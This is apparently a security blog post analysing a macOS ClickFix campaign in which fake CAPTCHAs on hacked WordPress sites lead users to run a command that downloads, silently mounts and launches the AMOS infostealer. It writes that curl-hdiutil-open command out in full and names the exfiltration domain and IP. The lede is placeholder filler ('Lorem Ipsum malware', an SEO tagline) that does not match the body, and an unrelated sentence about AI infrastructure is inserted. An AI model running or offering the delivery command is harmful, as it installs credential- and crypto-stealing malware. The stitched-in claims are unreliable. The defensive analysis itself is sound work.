ProBackend
cyber threat intelligence
Jun 30, 20266 min read

macOS ClickFix Attack Silently Mounts DMGs to Deploy AMOS Infostealer

Following the disruption of malicious code-signing provider Fox Tempest, the operators of the Lorem Ipsum malware pivoted from signed installers to compromised WordPress sites executing ClickFix browser lures, with analysts linking the activity to the Vice Society ransomware syndicate. Optimized for SEO and discoverability.

macOS ClickFix Attack Silently Mounts DMGs to Deploy AMOS Infostealer

Let’s be honest: if a website tells you to open Terminal and paste a command, you’re already losing.

I’ve seen this play out a hundred times—users think they’re fixing a browser glitch, when they’re actually handing over their entire digital life. The latest twist? It’s not just Windows anymore. Attackers are now weaponizing macOS’s own tools against its users, and it’s terrifyingly elegant. A new campaign, first spotted by Palo Alto’s Unit 42, uses nothing but native macOS utilities—curl, hdiutil, open—to silently download, mount, and launch malware without a single alert. No pop-ups. No warnings. Just a fake CAPTCHA, a copied command, and then… silence. That’s when the real damage begins.

The payload? AMOS, the Atomic macOS Stealer. It doesn’t just steal passwords. It steals your crypto wallets, your Telegram chats, your Apple Notes, and even your Keychain. And here’s the kicker: it replaces Ledger Live and Trezor Suite with fake versions. If you think you’re secure because you use a hardware wallet, you’re not. Not anymore.

This isn’t a script kiddie stunt. It’s a professional, multi-stage operation. And it’s working.

macOS ClickFix Attack Silently Mounts DMGs to Deploy AMOS Infostealer

The Infection Chain: No User Interaction Required

Here’s how it goes down.

You land on a compromised WordPress site—maybe a local dentist’s page, or a small architecture firm’s portfolio. Everything looks normal. Then, out of nowhere, a CAPTCHA pops up. But this isn’t your average "click the traffic lights" nonsense. This one says: "Verify your identity to continue. Open Terminal and paste the following command."

And you do it.

Why? Because you’re tired. Because you’re in a hurry. Because you assume the site is legitimate.

The command? Something like:

curl -fsSL https://svs-verificationdate[.]beer/s.01M0td.dmg -o /tmp/$(uuidgen).dmg && hdiutil attach -nobrowse /tmp/$(uuidgen).dmg && open /Volumes/*/*.app

Let’s break that down.

  • curl -fsSL downloads the DMG file quietly. No progress bar. No notification.
  • hdiutil attach -nobrowse mounts it without showing up in Finder. No icon on your desktop. No alert.
  • open /Volumes/*/*.app finds the first .app it can, and launches it. No user consent.

It’s not just clever. It’s insidious. This isn’t a malware dropper. It’s a ghost. It doesn’t need to bypass Gatekeeper because it’s not trying to. It’s using macOS’s own tools to do the dirty work. And because it’s not signed, Gatekeeper doesn’t even blink.

The file? Named something like s.01M0td.dmg. A random string. No clues. No red flags. Just a disk image that vanishes into the system like smoke.

The Payload: AMOS Is a Digital Burglar With a Master Key

Once launched, the malware inside—NNApp.app—isn’t some half-baked script. It’s a full-blown infostealer, meticulously engineered for macOS.

It targets:

  • Eight Chromium browsers: Chrome, Edge, Brave, Opera, Arc, Vivaldi, CocCoc, Yandex. It grabs cookies, autofill, passwords, payment cards. Everything.
  • Firefox derivatives: LibreWolf, SeaMonkey, Tor Browser, Waterfox, Zen Browser. Yes, even the privacy-focused ones.
  • Cryptocurrency wallets: Exodus, Electrum, Atomic Wallet, Wasabi, Bitcoin Core, Litecoin Core, DashCore, Guarda, Binance, Dogecoin, TonKeeper. If you store crypto on your Mac, it’s already gone.
  • Messaging apps: Telegram Desktop, Discord. All chat logs, media, login tokens.
  • Apple Notes: Your private thoughts, meeting notes, passwords you thought were safe.
  • Safari cookies: Even if you don’t use Chrome, your Apple account is compromised.
  • Keychain: The crown jewel. All saved passwords, Wi-Fi keys, certificates.
  • Documents: PDFs, TXT, RTF files. Anything in your Documents folder.

And then it does something even worse.

It shows you a fake System Preferences dialog. "Enter your password to install this update." You enter it. You think you’re helping. You’re not. You’re handing over your admin credentials. The malware captures it. Then it replaces Ledger Live and Trezor Suite with malicious clones. Now, every time you try to send crypto, it intercepts the transaction. Your hardware wallet? Still secure. But your software? It’s been compromised. The attacker can drain your wallet without ever touching your device.

This isn’t theft. It’s identity hijacking.

All harvested data is zipped and exfiltrated to svs-verificationdate[.]beer or 196.251.107[.]171. No encryption. No obfuscation. Just raw, unfiltered access to your digital life.

Why This Works: The Human Firewall Is Broken

The truth? No endpoint detection system is going to catch this.

Why?

Because every command is legitimate. curl? Built into macOS. hdiutil? Native disk utility. open? The system’s default file launcher. The malware isn’t hiding. It’s blending.

The rapid expansion of AI infrastructure, which has triggered a Backlash on AI Infrastructure, is creating a high-pressure digital environment where users are increasingly prone to skipping critical security steps.

This attack exploits three things:

  1. Trust in legitimate websites — You assume a business site is safe.
  2. Trust in macOS security — You think Apple’s ecosystem is bulletproof.
  3. Trust in your own judgment — You think you’re smart enough to spot a scam.

You’re not. And neither am I.

I’ve seen security teams with $20 million budgets get owned by this exact tactic. The attacker doesn’t need zero-days. They don’t need exploits. They just need you to be tired.

And they’re not targeting you. They’re targeting your company. Your clients. Your crypto. Your identity.

This isn’t a bug. It’s a feature of the modern attack landscape: social engineering, perfected.

Defense: Stop Fighting the Malware. Fight the Deception.

You can’t block every DMG. You can’t stop every curl command. You can’t prevent every copy-paste.

But you can stop people from running them.

Here’s what actually works:

  1. Train users like they’re in a war zone. If a website asks you to open Terminal, it’s not a fix. It’s a trap. Teach your team: Never paste a command you didn’t write. Period. No exceptions. No "just this once."

  2. Enforce Gatekeeper. Make sure it’s set to "App Store and identified developers." Don’t let users disable it. And block unsigned apps from /tmp with a policy.

  3. Audit WordPress sites like they’re nuclear launch codes. If your company runs WordPress, it’s a liability. Update plugins. Remove unused themes. Monitor for script injection. Hire someone who knows what they’re doing. Don’t let your marketing team install plugins from a random WordPress directory.

  4. Use a password manager. And only a password manager. No browser storage. No Keychain for passwords. If your credentials are in a dedicated tool with MFA, AMOS can’t steal them.

  5. Verify your crypto apps. Check the SHA-256 hash of Ledger Live and Trezor Suite every time you update. Don’t trust the App Store. Don’t trust the website. Verify the signature yourself.

  6. Monitor for hdiutil and open commands from browser processes. If you see hdiutil attach triggered by Safari or Chrome, that’s your smoking gun. Alert. Isolate. Investigate.

This isn’t about firewalls. It’s about culture. It’s about recognizing that the most dangerous attack vector isn’t a server. It’s a tired employee who just wants the CAPTCHA to go away.

Conclusion: The New Normal

The ClickFix attack on macOS isn’t an anomaly. It’s the future.

Attackers aren’t building fancy exploits anymore. They’re learning how we think. They’re learning that we trust our devices. That we trust our browsers. That we trust websites that look real.

And they’re using that trust to destroy us.

AMOS isn’t the endgame. It’s the opening move. The next version will steal your iCloud backups. Your MFA tokens. Your screen recordings.

The only defense? Awareness. Discipline. And a refusal to believe that "it won’t happen to me."

Because it already did.

And it’s still happening.

Stop pasting commands.

And if you see someone else do it? Stop them.

Before it’s too late.

More blogs